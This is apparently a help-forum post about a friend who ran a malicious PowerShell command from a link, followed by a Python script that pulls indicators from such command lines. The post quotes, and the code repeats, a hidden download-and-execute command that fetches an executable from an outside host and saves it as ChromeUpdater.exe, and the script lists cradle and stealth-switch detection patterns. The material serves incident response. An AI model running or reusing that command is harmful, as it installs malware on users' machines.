A friend downloaded a file that had a password-protected zip file with a link to the password.
The link ran the following command.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.gocataclysm.com/soyotxfbtgoj.exe','%APPDATA%\ChromeUpdater.exe');Start-Process '%AP
I assume that the command downloaded 'soyotxfbtgoj.exe' to the user's APPDATA folder and renamed it ChromeUpdater.exe. I don't know what Start-Process '%AP does though.
After the user clicked the link, Chrome crashed and they shut down and called me. I deleted ChromeUpdater.exe from the user's AppData and I'm currently running a Malwarebytes scan and a Windows Defender scan.
Any thoughts on what else I should do, and what the Start-Process '%AP part of the command does?
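As an added example (my own code, not the poster's), here is a small Python triage helper for a PowerShell command line like the one quoted above. It pulls out the pieces a responder wants on a ticket: the download URL and the domain to block or hunt for in proxy logs, the file path the payload was written to so it can be checked for on other machines, the switches that hide the window and skip the execution-policy check, and whether the quoted command is cut off (the post's copy ends at '%AP, and the example reports that rather than guessing what followed). The sample command line embedded in the code is the one from the post; the switch and cradle patterns and the scoring weights are my own choices, not a standard.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the command line exactly as quoted in the post above.
# It is truncated at '%AP in the post, and it is left that way here.
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass "
    r"-noprofile -windowstyle hidden (New-Object System.Net.WebClient)"
    r".DownloadFile('https://a.pomf.gocataclysm.com/soyotxfbtgoj.exe','%APPDATA%\ChromeUpdater.exe');"
    r"Start-Process '%AP"
)

# Switches commonly used to keep a script quiet; labels and patterns are my own.
SUSPICIOUS_SWITCHES = [
    ("ExecutionPolicy Bypass", r"-ex\w*\s+bypass"),
    ("NoProfile", r"-nop\w*\b"),
    ("WindowStyle Hidden", r"-w\w*\s+hidden"),
    ("EncodedCommand", r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
]

# Download-and-run building blocks ("download cradle" indicators).
CRADLE_INDICATORS = [
    ("Net.WebClient", r"Net\.WebClient"),
    ("DownloadFile", r"\.DownloadFile\("),
    ("DownloadString", r"\.DownloadString\("),
    ("Invoke-WebRequest", r"Invoke-WebRequest|\biwr\b"),
    ("Invoke-Expression", r"Invoke-Expression|\biex\b"),
    ("Start-BitsTransfer", r"Start-BitsTransfer"),
    ("Start-Process", r"Start-Process"),
]

URL_RE = re.compile(r"https?://[^\s'\"),;]+", re.IGNORECASE)
# A quoted string containing a backslash: treated as a dropped-file path.
QUOTED_PATH_RE = re.compile(r"['\"]([^'\"]*\\[^'\"]*)['\"]")


def triage_powershell_cmdline(cmdline: str) -> dict:
    """Extract indicators from a PowerShell command line and score it."""
    switches = [name for name, pat in SUSPICIOUS_SWITCHES
                if re.search(pat, cmdline, re.IGNORECASE)]
    indicators = [name for name, pat in CRADLE_INDICATORS
                  if re.search(pat, cmdline, re.IGNORECASE)]
    urls = URL_RE.findall(cmdline)
    domains = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    dropped_paths = QUOTED_PATH_RE.findall(cmdline)

    # An odd number of quote characters means the command we were given is
    # incomplete (copied from a log or a post that cut it off).
    truncated = cmdline.count("'") % 2 == 1 or cmdline.count('"') % 2 == 1

    # Simple additive score: network fetch weighs most, cradle verbs next,
    # stealth switches least. Weights are arbitrary but ordered by severity.
    score = len(switches) + 2 * len(indicators) + (3 if urls else 0)
    network_fetch = any(n in indicators for n in
                        ("DownloadFile", "DownloadString", "Invoke-WebRequest",
                         "Start-BitsTransfer", "Net.WebClient"))
    return {
        "is_download_cradle": bool(urls) and network_fetch,
        "urls": urls,
        "download_domains": domains,
        "dropped_paths": dropped_paths,
        "suspicious_switches": switches,
        "cradle_indicators": indicators,
        "truncated": truncated,
        "score": score,
    }


if __name__ == "__main__":
    result = triage_powershell_cmdline(SAMPLE_CMDLINE)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the sample, the report names the domain a.pomf.gocataclysm.com, the path %APPDATA%\ChromeUpdater.exe, the three stealth switches, and marks the command as truncated, which is the same reading the post gives: fetch the executable, write it under AppData under a Chrome-sounding name, then launch it. The same function can be fed command lines from PowerShell operational logs or an EDR export to find other hosts that ran something similar.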